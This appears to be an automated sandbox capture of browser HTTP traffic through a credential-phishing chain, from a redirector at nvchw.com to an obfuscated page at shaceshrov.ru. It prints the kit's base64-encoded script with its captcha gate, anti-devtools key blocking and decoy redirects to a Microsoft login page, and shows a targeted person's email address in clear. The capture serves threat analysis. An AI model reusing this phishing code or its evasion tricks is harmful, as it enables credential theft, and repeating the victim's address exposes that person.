                                                                  2025-01-13 21:37:17 UTC697OUTGET /winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ== HTTP/1.1
                                                                  Host: nvchw.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:18 UTC224INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:18 GMT
                                                                  Server: Apache
                                                                  refresh: 0;url=https://M7Sn.shaceshrov.ru/IgEEv/#Mrlampros@ofsoptics.com
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=UTF-8


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.1649722103.83.194.554437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:18 UTC619OUTGET /favicon.ico HTTP/1.1
                                                                  Host: nvchw.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://nvchw.com/winner/1dsbr/cmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:19 UTC164INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:37:19 GMT
                                                                  Server: Apache
                                                                  Content-Length: 315
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  2025-01-13 21:37:19 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.1649725172.67.204.744437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:19 UTC682OUTGET /IgEEv/ HTTP/1.1
                                                                  Host: m7sn.shaceshrov.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-Dest: document
                                                                  Referer: https://nvchw.com/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:20 UTC1248INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:20 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJtvQv7qNAvK8aLIbpV%2FlS2d2HRCn981DuAwZeQqZR0ZbewC%2BQtnIChCFXk9PHhu05oP4qZ%2BEFRouvoFH2jzZrHW%2FFjrEtao22Lqk5%2BZqfJnAGWl4GGbS1pfnbLTRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=74054&min_rtt=73773&rtt_var=28228&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1590&delivery_rate=37461&cwnd=239&unsent_bytes=0&cid=797b4b5aea24f885&ts=280&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Inc1V1dMc1ZQRWxxdjRBcUI2WnJOL2c9PSIsInZhbHVlIjoiTTJ2TEZpQjdYaE1CUVJSNFNEY2tyYWh2eVRzTjlWeW83eTJZMzNJUmY3Q0VVL1FqOFNuaFAyMWsyM3FMc044bjJMV3VFZ3FJaU04K2toVnJDLzEyNnFpK2pWbzRtUFh5V3BSWjZ4N21DTSt6dmQ2UHZkUVhjUXZzdmZLTmhDV3EiLCJtYWMiOiJiMzAyOWExNzBkZDIwNmI4MWZlN2JjOGFjNWNlODlkYWQ0ZTdjMzJiZGU5N2MxYThhMTExMTRkYmIwZWMxNThkIiwidGFnIjoiIn0%3D; expires=Mon, 13-Jan-2025 23:37:19 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-01-13 21:37:20 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 6f 32 4f 56 49 76 54 58 4e 53 53 48 52 71 4d 44 6c 4c 51 33 46 56 64 6c 52 50 4d 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 33 42 36 54 6c 64 4b 62 58 56 46 4f 44 4a 52 56 32 78 6a 53 33 59 34 56 32 78 42 4e 57 68 43 53 79 39 43 61 44 67 35 65 6c 6c 61 59 6b 70 54 53 54 59 78 64 6e 4e 44 51 32 64 78 4f 54 6c 44 64 6b 46 6a 57 6a 42 47 61 43 39 6d 51 57 64 47 4d 45 4d 77 59 55 59 79 59 6b 5a 6e 64 48 70 4e 51 6d 34 78 5a 47 55 33 51 7a 45 76 53 31 5a 58 52 55 34 32 52 69 39 4b 5a 7a 68 4c 63 30 52 75 55 56 52 61 62 46 46 55 62 57 64 78 64 56 63 76 63 6e 46 6d 62 46 46 56 55 44 49 34 54 7a 4e 7a 52 6d 5a 42 52 44 56 6b 4c 79 38
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ilo2OVIvTXNSSHRqMDlLQ3FVdlRPMnc9PSIsInZhbHVlIjoiU3B6TldKbXVFODJRV2xjS3Y4V2xBNWhCSy9CaDg5ellaYkpTSTYxdnNDQ2dxOTlDdkFjWjBGaC9mQWdGMEMwYUYyYkZndHpNQm4xZGU3QzEvS1ZXRU42Ri9KZzhLc0RuUVRabFFUbWdxdVcvcnFmbFFVUDI4TzNzRmZBRDVkLy8
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 37 39 39 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 66 69 6e 61 6c 2c 20 66 61 69 6c 75 72 65 20 69 73 20 6e 6f 74 20 66 61 74 61 6c 3a 20 49 74 20 69 73 20 74 68 65 20 63 6f 75 72 61 67 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 74 68 61 74 20 63 6f 75 6e 74 73 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 54 68 65 20 6f 6e 6c 79 20 77 61 79 20 74 6f 20 64 6f 20 67 72 65 61 74 20 77 6f 72 6b 20 69 73 20 74 6f 20 6c 6f 76 65 20 77 68 61 74 20 79 6f 75 20 64 6f 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 66 75 6c 20 70 65 6f 70 6c 65 20 64 6f 20 77 68 61 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 20 70 65 6f 70 6c 65 20 61 72 65 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 6f 2e 20 44 6f 6e 26 23 30 33
                                                                  Data Ascii: 799... Success is not final, failure is not fatal: It is the courage to continue that counts. -->... The only way to do great work is to love what you do. --><script>/* Successful people do what unsuccessful people are not willing to do. Don&#03
                                                                  2025-01-13 21:37:20 UTC583INData Raw: 4c 6a 49 37 66 51 30 4b 49 32 70 54 55 47 74 36 54 31 46 51 62 58 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 70 54 55 47 74 36 54 31 46 51 62 58 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 61 6c 4e 51 61 33 70 50 55 56 42 74 63 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 70 54 55 47 74 36 54 31 46 51 62 58 49 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39
                                                                  Data Ascii: LjI7fQ0KI2pTUGt6T1FQbXIgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2pTUGt6T1FQbXIgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojalNQa3pPUVBtciBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2pTUGt6T1FQbXIuY2FwdGNoYS1jb250YWluZXJ7cG9
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 31 38 62 31 0d 0a 6e 42 34 4b 58 73 4e 43 69 4e 71 55 31 42 72 65 6b 39 52 55 47 31 79 49 43 35 6a 62 32 77 74 62 47 63 74 4e 48 74 6d 62 47 56 34 4f 6a 41 67 4d 43 42 68 64 58 52 76 4f 33 64 70 5a 48 52 6f 4f 6a 4d 7a 4c 6a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4a 54 74 39 44 51 70 39 44 51 6f 6a 61 6c 4e 51 61 33 70 50 55 56 42 74 63 69 41 75 5a 47 6c 7a 63 47 78 68 65 53 30 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 75 4d 6a 56 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 71 55 31 42 72 65 6b 39 52 55 47 31 79 49 43 35 74 64 43 30 79 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 77 4c 6a 56 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 71 55 31 42 72 65 6b 39 52 55 47 31 79 49 43
                                                                  Data Ascii: 18b1nB4KXsNCiNqU1Brek9RUG1yIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojalNQa3pPUVBtciAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNqU1Brek9RUG1yIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNqU1Brek9RUG1yIC
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 63 30 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 49 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68
                                                                  Data Ascii: dmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgICh
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 48 30 73 49 44 45 77 4d 43 6b 37 44 51 70 39 4b 53 67 70 4f 77 30 4b 49 43 41 67 49 44 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 39 6f 5a 57 46 6b 50 67 30 4b 44 51 6f 38 59 6d 39 6b 65 53 42 7a 64 48 6c 73 5a 54 30 69 5a 6d 39 75 64 43 31 6d 59 57 31 70 62 48 6b 36 49 47 46 79 61 57 46 73 4c 43 42 7a 59 57 35 7a 4c 58 4e 6c 63 6d 6c 6d 4f 32 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4e 6d 5a 6d 59 37 59 32 39 73 62 33 49 36 49 43 4d 77 4d 44 41 37 63 47 46 6b 5a 47 6c 75 5a 7a 6f 67 4d 6a 42 77 65 44 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 34 63 48 67 37 62 33 5a 6c 63 6e 4e 6a 63 6d 39 73 62 43 31 69 5a 57 68 68 64 6d 6c 76 63 6a 6f 67 59 32 39 75 64 47 46 70 62 6a 73 69 50 67 30 4b 50 47 52 70 64 69 42 70
                                                                  Data Ascii: H0sIDEwMCk7DQp9KSgpOw0KICAgIDwvc2NyaXB0Pg0KPC9oZWFkPg0KDQo8Ym9keSBzdHlsZT0iZm9udC1mYW1pbHk6IGFyaWFsLCBzYW5zLXNlcmlmO2JhY2tncm91bmQtY29sb3I6ICNmZmY7Y29sb3I6ICMwMDA7cGFkZGluZzogMjBweDtmb250LXNpemU6IDE4cHg7b3ZlcnNjcm9sbC1iZWhhdmlvcjogY29udGFpbjsiPg0KPGRpdiBp
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 55 74 53 30 70 78 59 6d 39 61 59 54 6c 4e 4a 79 77 4e 43 69 41 67 49 43 41 6e 5a 58 4a 79 62 33 49 74 59 32 46 73 62 47 4a 68 59 32 73 6e 4f 69 42 71 61 48 46 50 65 48 70 7a 55 47 64 31 4c 41 30 4b 49 43 41 67 49 47 4e 68 62 47 78 69 59 57 4e 72 4f 69 42 7a 63 55 56 4c 52 33 64 50 53 6c 4a 46 4c 41 30 4b 66 53 6b 37 44 51 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 71 61 48 46 50 65 48 70 7a 55 47 64 31 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 48 52 31 63 6d 35 7a 64 47 6c 73 5a 53 35 79 5a 58 4e 6c 64 43 67 70 4f 77 30 4b 66 51 30 4b 5a 6e 56 75 59 33 52 70 62 32 34 67 63 33 46 46 53 30 64 33 54 30 70 53 52 53 67 70 49 48 73 4e 43 69 41 67 49 43 42 32 59 58 49 67 55 33 6c 59 54 33 5a 78 54 32 6c 6a 59 53 41 39 49 47 52 76 59 33 56 74 5a 57 35 30 4c 6d 64 6c 64
                                                                  Data Ascii: UtS0pxYm9aYTlNJywNCiAgICAnZXJyb3ItY2FsbGJhY2snOiBqaHFPeHpzUGd1LA0KICAgIGNhbGxiYWNrOiBzcUVLR3dPSlJFLA0KfSk7DQpmdW5jdGlvbiBqaHFPeHpzUGd1KCkgew0KICAgIHR1cm5zdGlsZS5yZXNldCgpOw0KfQ0KZnVuY3Rpb24gc3FFS0d3T0pSRSgpIHsNCiAgICB2YXIgU3lYT3ZxT2ljYSA9IGRvY3VtZW50Lmdld
                                                                  2025-01-13 21:37:20 UTC853INData Raw: 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 73 62 32 64 70 62 69 35 74 61 57 4e 79 62 33 4e 76 5a 6e 52 76 62 6d 78 70 62 6d 55 75 59 32 39 74 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 39 4b 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 61 57 59 6f 64 47 56 34 64 43 41 68 50 53 41 77 4b 58 73 4e 43 69 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 73 62 32 64 70 62 69 35 74 61 57 4e 79 62 33 4e 76 5a 6e 52 76 62 6d 78 70 62 6d 55 75 59 32 39 74 4a 79 6b 37 44 51 6f 67 49 43
                                                                  Data Ascii: pew0KICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tJyk7DQogICAgICAgIH0NCiAgICB9KTsNCiAgICB9DQogICAgaWYodGV4dCAhPSAwKXsNCiAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tJyk7DQogIC
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 32 65 35 30 0d 0a 6b 4f 63 43 78 4e 4d 57 46 50 20 3d 20 6e 65 77 20 55 52 4c 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 4e 4e 31 4e 75 4c 6e 4e 6f 59 57 4e 6c 63 32 68 79 62 33 59 75 63 6e 55 76 53 57 64 46 52 58 59 76 22 29 29 3b 0d 0a 63 6f 6e 73 74 20 65 62 46 58 58 54 70 79 69 4d 20 3d 20 6b 4f 63 43 78 4e 4d 57 46 50 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 76 45 64 67 59 50 57 64 45 6f 20 3f 20 6b 4f 63 43 78 4e 4d 57 46 50 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 6b 4f 63 43 78 4e 4d 57 46 50 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 65 62 46 58 58 54 70 79 69 4d 20 3d 3d 20 76 45 64 67 59 50 57 64 45 6f 29 7b 0d 0a 63 6f 6e 73 74 20 63 6c
                                                                  Data Ascii: 2e50kOcCxNMWFP = new URL(atob("aHR0cHM6Ly9NN1NuLnNoYWNlc2hyb3YucnUvSWdFRXYv"));const ebFXXTpyiM = kOcCxNMWFP.hostname === vEdgYPWdEo ? kOcCxNMWFP.hostname : kOcCxNMWFP.hostname.split('.').slice(-2).join('.');if(ebFXXTpyiM == vEdgYPWdEo){const cl
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 73 62 33 63 36 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 71 55 31 42 72 65 6b 39 52 55 47 31 79 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 32 70 54 55 47 74 36 54 31 46 51 62 58 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 70 54 55 47 74 36 54 31 46 51 62 58 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a
                                                                  Data Ascii: sb3c6IGhpZGRlbjsNCn0NCiNqU1Brek9RUG1yIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2pTUGt6T1FQbXIgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2pTUGt6T1FQbXIgaDR7Zm9udC1zaXplOj


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.1649729104.17.24.144437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:20 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://m7sn.shaceshrov.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:20 UTC964INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:20 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"61182885-40eb"
                                                                  Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: HIT
                                                                  Age: 462051
                                                                  Expires: Sat, 03 Jan 2026 21:37:20 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXrZZI2K5fGv070sOMDepXG2cV%2Fh4aouKKuyu5zac0KG4YcomMRfLHLYzzGfkvyvmq1hFLdbczZ5IlTk%2FM%2B%2BtYYyhjok%2Bze89AdFUsh6k7DOgm21%2F4yiqRuUWRpU2P6H6Cw2y3xR"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 901886e88d96c47c-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:20 UTC405INData Raw: 37 62 65 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                  Data Ascii: 7be5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                  Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
